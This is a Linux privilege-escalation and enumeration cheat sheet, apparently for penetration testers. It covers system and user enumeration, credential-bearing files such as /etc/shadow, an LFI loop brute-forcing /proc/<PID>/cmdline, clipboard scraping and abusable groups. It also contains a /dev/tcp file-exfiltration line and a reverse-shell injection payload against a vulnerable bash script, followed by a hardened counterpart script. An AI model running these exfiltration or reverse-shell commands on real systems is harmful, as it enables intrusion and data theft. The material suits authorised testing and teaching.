# Linux

## Enumeration

### Commands

```bash
# SUDO CONFIG
sudo -l

# CURRENT USER INFO
id || (whoami && groups) 2>/dev/null
## Current user PGP keys
gpg --list-keys 2>/dev/null


# ALL USERS
## List superusers
awk -F: '($3 == "0") {print}' /etc/passwd

## List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort

## Logged in users
w


# SYSTEM INFO
## Running processes
ps aux

## Environment variables
(env || set) 2>/dev/null

## Network topology
cat /proc/net/fib_trie

## Domain name
hostname

## OS info
cat /etc/os-release


# FILES AND DIRECTORIES
## Sort files by date
ls -ltrh

## Writeable folders
find / -writable -type d 2>/dev/null

## Find SUID files
find / -perm -4000 2>/dev/null


# NETWORK
## List open ports
(netstat -punta || ss -ntpu) 2>/dev/null


# MISC
## Human readable JSON data (jq)
jq . <json_file>

## Send a file from the shell session to a TCP listener on <ip>:<port> (bash /dev/tcp; the listener side receives the "download")
cat <file> > /dev/tcp/<ip>/<port>

## PING SWEEP - when other machines are suspected on the network (e.g. the current machine is a VM or a container)
for i in {1..254}; do (ping -c 1 10.10.10.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
```

### Directories / Files

```bash
~/
/tmp

/dev/shm

/opt

/var
/var/log
/var/www/html

/usr/sbin

/etc/apache2 
/etc/httpd
/etc/nginx

/etc/hosts
/etc/issue
/etc/motd
/etc/passwd 
/etc/group 
/etc/resolv.conf
/etc/shadow

/home/USERNAME/.bash_history
/home/USERNAME/.profile

/proc/sched_debug
/proc/net/fib_trie
/proc/version
/proc/self/environ
/proc/self/cmdline
```

### Process File (PID) Brute-force

The file `/proc/<PID>/cmdline` holds the command-line arguments that were passed to the process identified by that PID. Reading it for a range of PIDs enumerates the running processes.\
This can be useful when exploiting an LFI.

```bash
# Example script to exploit LFI
for i in {0..999}; do
    pid=$i
    url="http://remote.com/?page=../../../..//proc/$pid/cmdline"
    curl -s "$url" | tee -a log.txt
    echo ""
done
```

### Directory / File Copy (symlink)

If a directory or file is being copied *(by some program, perhaps cron)*, one can either create a symlink or replace the actual file outright, so that the copied item is spoofed and contains the data the attacker wants.

## Clipboard

Look for anything interesting in the clipboard (requires an X session; both tools read the X selections).

```bash
if command -v xclip >/dev/null 2>&1; then
    echo "Clipboard: $(xclip -o -selection clipboard 2>/dev/null)"
    echo "Highlighted text: $(xclip -o 2>/dev/null)"
elif command -v xsel >/dev/null 2>&1; then
    echo "Clipboard: $(xsel -ob 2>/dev/null)"
    echo "Highlighted text: $(xsel -o 2>/dev/null)"
else
    echo "Neither xsel nor xclip found"
fi
```

## Interesting Groups

### disk

A user in the `disk` group will probably have access to the data on a given disk.

### debugfs

`debugfs` lets you debug a file system if you can read the underlying device.\
With this, one can read files owned by another user.

## Bash File Command Execution

If a script executes the contents of a variable, one may be able to write a payload into it.

### Example

**(program.sh)**

```bash
#!/bin/bash

echo -e "Input:\t"
read myvar

/bin/bash -c $myvar
```

The attacker can supply the following payload:

```bash
./program.sh '>& /dev/tcp/<IP>/<PORT> 0>&1'
```
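As an added defender-side counterpart (example code, not from the original page), a hardened version of `program.sh` that validates the input and never hands it to a shell as a command string; the names `is_safe_name`, `handle_input` and the `SAFE_DIR` location are this example's own assumptions.

```bash
# Added example (not from the original page): a hardened counterpart to program.sh.
# Quoting alone does not help (`/bin/bash -c "$myvar"` still executes whatever was
# typed); the fix is to never hand user input to a shell as a command string.
# is_safe_name, handle_input and SAFE_DIR are this example's own assumptions.

# Accept only names made of letters, digits, dot, underscore and dash, so that
# shell metacharacters (; | > & $ ( ) ` and whitespace) are rejected, and refuse
# ".." so the name cannot escape the directory.
is_safe_name() {
    case "$1" in
        '' | *[!A-Za-z0-9._-]*) return 1 ;;   # empty, or contains a forbidden char
        *..*)                   return 1 ;;   # parent-directory traversal
        *)                      return 0 ;;
    esac
}

# Hardened replacement for `/bin/bash -c $myvar`: the input only ever selects a
# file inside $SAFE_DIR whose size is reported by a fixed command; it is never
# parsed as shell syntax. Prints the size in bytes; exit 2/3 on rejection.
SAFE_DIR="${SAFE_DIR:-/var/tmp/reports}"   # assumed location, adjust as needed

handle_input() {
    if ! is_safe_name "$1"; then
        printf 'rejected: invalid name\n' >&2
        return 2
    fi
    if [ ! -f "$SAFE_DIR/$1" ]; then
        printf 'rejected: no such report\n' >&2
        return 3
    fi
    wc -c < "$SAFE_DIR/$1" | tr -d ' '
}

# Interactive use, as in the original program.sh: read one line (-r keeps
# backslashes literal) and pass it to handle_input as data, never as a command.
main() {
    printf 'Input:\t'
    IFS= read -r myvar || return 1
    handle_input "$myvar"
}
```

Call `main` to use it interactively; the reverse-shell string from the payload above is rejected by `is_safe_name` before any command runs.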

## Services

[gtfobins help](https://gtfobins.github.io/gtfobins/systemctl/)

A service is defined by a `.service` file. `systemctl` is used to register it with `systemd` and then used again to start the service.\
What the service does is defined in the `.service` file.

If a user has access to the `systemctl` binary, they can create a service that reads a file or even spawns a reverse shell.

## Raw Image File Conversion to Actual Image

Raw image data can be converted to an actual image to reveal its content.

### Gimp

1. Select the file and set its type to "Raw image data"
2. Select the resolution (`cat /sys/class/graphics/fb0/virtual_size` if unknown)
3. Adjust the image type until the picture renders correctly
4. Export as PNG

